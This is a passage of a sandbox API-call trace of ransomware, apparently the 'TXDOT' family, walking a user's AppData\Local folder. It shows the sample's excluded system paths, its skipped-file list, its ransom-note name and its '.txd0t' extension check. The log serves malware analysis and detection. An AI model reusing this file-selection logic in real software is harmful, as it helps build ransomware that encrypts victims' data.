[0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0129.120] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0129.120] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0129.120] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.120] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0129.120] GetProcessHeap () returned 0xe30000 [0129.120] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xed90d0 [0129.120] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.120] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\*") returned="C:\\Users\\FD1HVy\\AppData\\Local\\*" [0129.120] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.120] StrCmpW (psz1=".", psz2=".") returned 0 [0129.120] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.121] StrCmpW (psz1="..", psz2=".") returned 1 [0129.121] StrCmpW (psz1="..", psz2="..") returned 0 [0129.121] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501e95f1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x501e95f1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.121] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.121] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.121] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt" [0129.121] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.121] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.121] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.121] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0129.121] StrCmpW (psz1="ActiveSync", psz2=".") returned 1 [0129.121] StrCmpW (psz1="ActiveSync", psz2="..") returned 1 [0129.121] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ActiveSync", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" [0129.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system32\\") returned 0x0 [0129.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system\\") returned 0x0 [0129.121] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ActiveSync" [0129.122] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0129.122] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0129.122] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0129.122] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Adobe", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Adobe" [0129.122] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0129.122] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0129.122] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0129.122] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0129.122] StrCmpW (psz1="CEF", psz2=".") returned 1 [0129.122] StrCmpW (psz1="CEF", psz2="..") returned 1 [0129.122] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.122] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="CEF", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\CEF") returned="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system32\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.122] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\CEF" [0129.122] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0129.122] StrCmpW (psz1="Comms", psz2=".") returned 1 [0129.122] StrCmpW (psz1="Comms", psz2="..") returned 1 [0129.122] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Comms", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Comms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" [0129.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0129.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0129.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.123] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.123] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0129.123] StrCmpW (psz1="ConnectedDevicesPlatform", psz2=".") returned 1 [0129.123] StrCmpW (psz1="ConnectedDevicesPlatform", psz2="..") returned 1 [0129.123] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ConnectedDevicesPlatform", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" [0129.123] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0129.123] StrCmpW (psz1="Google", psz2=".") returned 1 [0129.123] StrCmpW (psz1="Google", psz2="..") returned 1 [0129.123] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Google", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Google") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Google" [0129.123] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0129.123] StrCmpW (psz1="History", psz2=".") returned 1 [0129.123] StrCmpW (psz1="History", psz2="..") returned 1 [0129.123] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0129.123] StrCmpW (psz1="IconCache.db", psz2=".") returned 1 [0129.123] StrCmpW (psz1="IconCache.db", psz2="..") returned 1 [0129.123] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="IconCache.db", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db") returned="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" [0129.124] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0129.124] StrCmpW (psz1=".db", psz2=".txd0t") returned -1 [0129.124] StrCmpIW (psz1="IconCache.db", psz2="bootsect.bak") returned 1 [0129.124] StrCmpIW (psz1="IconCache.db", psz2="iconcache.db") returned 0 [0129.124] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0129.124] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0129.124] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0129.124] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Microsoft", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" [0129.124] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0129.124] StrCmpW (psz1="MicrosoftEdge", psz2=".") returned 1 [0129.124] StrCmpW (psz1="MicrosoftEdge", psz2="..") returned 1 [0129.124] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="MicrosoftEdge", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge") returned="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" [0129.124] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0129.124] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0129.124] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0129.124] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Mozilla", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" [0129.124] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0129.124] StrCmpW (psz1="Packages", psz2=".") returned 1 [0129.124] StrCmpW (psz1="Packages", psz2="..") returned 1 [0129.124] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.124] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Packages", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0129.124] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, 